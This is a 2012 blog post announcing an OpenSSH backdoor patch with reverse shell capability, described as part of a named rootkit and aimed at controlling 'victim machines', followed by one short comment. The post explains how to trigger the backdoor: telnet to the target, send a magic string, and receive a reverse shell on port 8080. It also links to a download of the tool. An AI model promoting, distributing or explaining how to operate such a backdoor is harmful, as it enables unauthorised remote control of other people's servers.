Friday, November 2, 2012

udc-hackssh-v3_bajaulaut-v1.2

udc-hackssh_bajaulaut is an openssh backdoor combined with reverse shell capability and part of udc-kolansong rootkit. The idea was to make use of openssh binary to control target and/or victim machines.

If you received something like "ssh_exchange_identification: Connection closed by remote host", this tool may make your life easy. Telnet to target machine and issue 'udc_gamai_magic' string. Once sent, sshd will then execute and connect to your 'client' machine on port 8080.

However, this patch has limitation. It can ONLY execute reverse openssh command to the machine where the telnet command execute from.

Download udc-hackssh-v3_bajaulaut-v1.2 here.

1 comment:

Muhamad Fadzil Ramli said...

bajaudarat bila pulak slash, anyway terbaek la slash, w00t w00t.